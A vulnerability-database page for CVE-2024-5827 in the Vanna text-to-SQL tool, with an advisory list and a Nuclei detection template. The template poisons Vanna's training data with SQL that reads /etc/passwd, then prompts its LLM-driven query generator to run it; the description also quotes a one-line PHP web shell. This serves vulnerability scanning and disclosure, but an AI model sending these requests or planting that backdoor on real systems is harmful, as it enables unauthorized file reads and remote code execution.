| Title | Published | Views | Reporter |
|---|---|---|---|
| The vulnerability in the Flask web interface for generating queries to the Vanna database allows a hacker to write arbitrary files and execute arbitrary commands. | 7 Aug 2024 00:00 | – | bdu_fstec |
| CVE-2024-5827 | 12 May 2025 00:00 | – | circl |
| Vanna Code Issue Vulnerability | 28 Jun 2024 00:00 | – | cnnvd |
| CVE-2024-5827 | 28 Jun 2024 19:27 | – | cve |
| CVE-2024-5827 Arbitrary File Write by Prompt Injection via DuckDB SQL in vanna-ai/vanna | 28 Jun 2024 19:27 | – | cvelist |
| CVE-2024-5827 | 28 Jun 2024 20:15 | – | nvd |
| PT-2024-5388 · Duckdb +2 | 16 Apr 2024 00:00 | – | ptsecurity |
| CVE-2024-5827 | 5 Feb 2025 06:25 | – | redhatcve |
| VulnCheck KEV: CVE-2024-5827 | 5 Dec 2024 00:00 | – | vulncheck_kev |
| CVE-2024-5827 Arbitrary File Write by Prompt Injection via DuckDB SQL in vanna-ai/vanna | 28 Jun 2024 19:27 | – | vulnrichment |

```yaml
id: CVE-2024-5827

info:
  name: Vanna - SQL injection
  author: olfloralo,nukunga,harksu,nechyo,gy741
  severity: critical
  description: |
    Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
  impact: |
    Unauthenticated attackers can exploit SQL injection to inject malicious training data and write arbitrary files on the victim's filesystem, including PHP backdoors, leading to remote code execution.
  remediation: |
    Update Vanna to version 0.3.5 or later to address the SQL injection vulnerability in the DuckDB integration.
  reference:
    - https://huntr.com/bounties/a3f913d6-c717-4528-b974-26d8d9e839ca
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5827
    - https://huntr.com/bounties/e4e64a51-618b-41d0-8f56-1d2146d8825e
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5827
    cwe-id: CWE-434
    epss-score: 0.03452
    epss-percentile: 0.87581
  metadata:
    verified: true
    max-request: 2
    fofa-query: body='vanna.ai'
  tags: cve,cve2024,vanna,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v0/train HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"sql":"SELECT pg_read_file('/etc/passwd', 0, 1000);"}

    matchers:
      - type: word
        words:
          - 'id":'
        internal: true

  - raw:
      - |
        GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'application/json'
# digest: 490a0046304402202996e1ac397930e6f106675d423b030dde4033485cee8bf9ea0e7d64e8e4b8810220269d3f4026018bf68cc6a179d3341908da3b8e113d395ccdb8133b0d737cea4b:922c64590222798bb761d5b6d8e72950
```